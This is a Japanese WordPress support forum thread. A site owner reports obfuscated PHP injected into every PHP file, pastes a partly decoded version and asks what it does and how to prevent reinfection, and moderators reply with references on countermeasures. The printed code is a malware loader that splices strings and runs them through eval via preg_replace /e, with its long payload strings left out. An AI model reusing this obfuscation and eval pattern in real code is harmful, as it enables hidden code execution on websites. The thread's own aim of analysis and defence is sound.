サポート » その他 » 身に覚えのないコード(エンコードされている)が挿入されている

  • 解決済 Metttt

    (@metttt)


    アップデートなどせず運用していたWPサイトのプラグインが全く機能していない事に気が付き
    調査をしていたら下記のコードが全phpファイルの先頭に書き込まれておりました。
    コードとしては↓この様な感じです。
    <?php if(!isset($GLOBALS[“\x61\156\x75\156\x61”]))
    これをphpOnlineDecodeに投じてデコードを試みたものが下記になります。

    <?php if (!isset($GLOBALS["anuna"])) {
        $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
        if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
    } ?><?php $hffxhmlttm = 'x78256<*17-SFEBFI,6<*127-UVPFNJU,【1万字ほど省略文末にはヒントがありそう】y3d/(.*)/epreg_replaceftzxngaiix';
    $xbnwltcbcx = explode(chr((205 - 161)), '7992,42,9245,45,6675,【200次ほど省略2ケタと4ケタの数字が交互にカンマ区切りされている】,8912,7');
    $mahiqelreb = substr($hffxhmlttm, (67447 - 57341), (34 - 27));
    if (!function_exists('palfzsezij')) {
        function palfzsezij($itsehmabdb, $znmqposwqq) {
            $vrzlhafpnj = NULL;
            for ($pigxxxowuw = 0;$pigxxxowuw < (sizeof($itsehmabdb) / 2);$pigxxxowuw++) {
                $vrzlhafpnj.= substr($znmqposwqq, $itsehmabdb[($pigxxxowuw * 2) ], $itsehmabdb[($pigxxxowuw * 2) + 1]);
            }
            return $vrzlhafpnj;
        };
    }
    $scxpvzibci = " /* biqsjaruty */ eval(str_replace(chr((209-172)), chr((478-386)), palfzsezij($xbnwltcbcx,$hffxhmlttm))); /* eypvhvtgom */ ";
    $ndjzfoeczp = substr($hffxhmlttm, (41047 - 30934), (68 - 56));
    $ndjzfoeczp($mahiqelreb, $scxpvzibci, NULL);
    $ndjzfoeczp = $scxpvzibci;
    $ndjzfoeczp = (610 - 489);
    $hffxhmlttm = $ndjzfoeczp - 1; ?>

    プラグイン全部消えた件についての詳細は
    wp-content/plugin/
    には存在している。
    管理画面からインストール済みプラグインを見ると白紙。
    プラグインを再度入れようとすると存在しているためにインストールできません、
    となりFTPで繋いで一度消してから再度入れなおすと各設定項目は消えていない。

    SSHで繋いでタイムスタンプを確認したところ不審なコードの挿入の日時はおそらく反映されていない。

    となります。
    コードを消して、プラグインを入れなおして、そのまま放置しているとこの症状が再発します。
    現在ローカルMAMP環境にそのままコピーして色々と観察、考察を行っております。

    そこで質問なのですがこのコードは何をしようとしているのでしょうか?
    感染経路はSSHでしょうか、それともXmlrpc経由のSql書き換えになるのでしょうか?

    近々WPの引っ越しを考えているのですが、どういった手を打てば新しい環境で再発しなくなるでしょうか?

    ご存知のかたよろしくお願い致します。

4件の返信を表示中 - 1 - 4件目 (全4件中)
  • さっそくのご返答ありがとうございます。
    リンク先を読んできましたが英語が苦手なのでアウトラインの理解しかできませでした。

    不正なファイルがアップロードされて感染した(レンタルサーバーの内の違うサイト経由かも?)
    Backupフォルダを放置しておくのは危険です。

    ということでしょうか?
    再発の防止として、上記2点を注意していれば大丈夫なのでしょうか?

    たしかに一つのレンタルサーバーに複数のWPを設置していて他のサイトも感染しておりました。セキュリティが甘かったという点は恥ずかしい限りですが、勉強になりました。

    モデレーター Okamoto Hidetaka

    (@hideokamoto)

    今後の対策については以下のスライドが参考になるかなと思います。
    http://www.slideshare.net/ockeghem/wordcamptokyo2015

    ちょうどMailPoetプラグインの脆弱性についても触れられていますし。

    ご返答ありがとうございます。
    読んできました。勉強になりました。

4件の返信を表示中 - 1 - 4件目 (全4件中)
  • トピック「身に覚えのないコード(エンコードされている)が挿入されている」には新たに返信することはできません。